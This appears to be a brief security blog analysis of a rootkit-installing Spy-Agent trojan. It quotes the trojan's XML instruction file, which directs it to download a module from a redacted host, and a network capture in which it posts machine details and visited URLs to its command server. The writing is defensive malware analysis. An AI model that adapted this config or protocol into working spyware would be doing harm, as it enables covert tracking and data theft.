I recently came across an interesting sample. The sample installs a rootkit.

So far nothing interesting, since lots of malware installs a rootkit. The interesting part is how it communicates with a remote site, and how it works.

Once installed on the machine, this Spy-Agent trojan will first communicate with a remote site, and download packages with instructions on how to behave on the machine. The instructions are XML formatted, like the following excerpt:

<?xml version=”1.0″ encoding=”utf-8″ ?>
<bootscript name=”CoreApp::UrlMonitor” version=”100″>
    <downloads>
        <download service_name=”CoreApp::UrlMonitor”>
            <dll url=”http://www.[REMOVED]/UrlMonitor.100.z.img” service_version=”100″ service_exported_as=”UrlMonitor_Message_Handler” deleteable=”" default=”true” />
        </download>
    </downloads>
    <services>
        <service service_name=”CoreApp::UrlMonitor”>
           <parameters>
              <tn:data bytes=”0″>
                 <parameters>
                    <parameter name=”browsers”>
                       <browser name=”IExplore” sname=”IEXPLORE_SERVER” />
                       <browser name=”Firefox” sname=”"  />
                       <browser name=”Opera” sname=”"  />
                       <browser name=”NSShell” sname=”"  />
                       <browser name=”Netscape6″ sname=”"  />
                       <browser name=”Netscape Browser” sname=”"  />
                       <browser name=”Mozilla” sname=”"  />

This file, was named URLMonitor, and also says to download the package UrlMonitor.100.z.img. Other packages are downloaded as well, such as:

  • core.101.z.img
  • Notifier.104.z.img
  • URLNotifier.101.z.imo

Several other xml instruction files are downloaded too:

  • bootup.exe.xml
  • UrlMonitor.xml

When active, one action is to watch and report machine information and urls visited by the user. Here’s an excerpt of a WireShark network capture:

POST /cmd?op=post_url_ron HTTP/1.1 Content-Type:
application/x-www-form-urlencoded Accept: */* User-Agent: Internet Explorer
(compatible) Host: http://www.[removed].com/ Content-Length: 582 Connection:
Keep-Alive Cache-Control: no-cache Cookie: AlteonP=xxxxxxxxxxxxxxxxx  <?xml version=”1.0″encoding=”utf-8″?> <url-notifier><user-info><user-ip>192.168.x.x</user-ip>
<user-id>xxxxxxxxxxxxxxxxxxxxxxxxxxxxx</user-id>
<pub-id>XX8</pub-id>
<win-majversion>5</win-majversion>
<win-minversion>1</win-minversion>
<win-regkey>xxxxx-xxx-xxxxxxxx-xxxxx</win-regkey>
<useragent>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; V1)</useragent> <browser-name>iexplore</browser-name>
<browser-version>6.00.2900.2180</browser-version></user-info>
<nids></nids>
<websites><website><name>xx.msn.com</name>
<query-strings></query-strings></website></websites>
</url-notifier>.
HTTP/1.1 200 OK Date: Tue, 12 Jun 2007 xx:xx:xx GMT Server: Apache/1.3.33
(Unix) PHP/4.3.11 mod_perl/1.29 Connection: close Transfer-Encoding: chunked
Content-Type: text/html  66  <?xml version=”1.0″ encoding=”utf-8″ ?> <notification-command>
<!– empty –>
</notification-command>
 0

So, as you can see, very well formatted information, and communication, using XML.

Looks like we are getting into the XML trojans…:)